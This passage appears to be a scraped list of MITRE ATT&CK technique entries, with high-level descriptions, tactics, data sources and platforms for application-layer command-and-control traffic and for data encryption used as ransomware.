Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre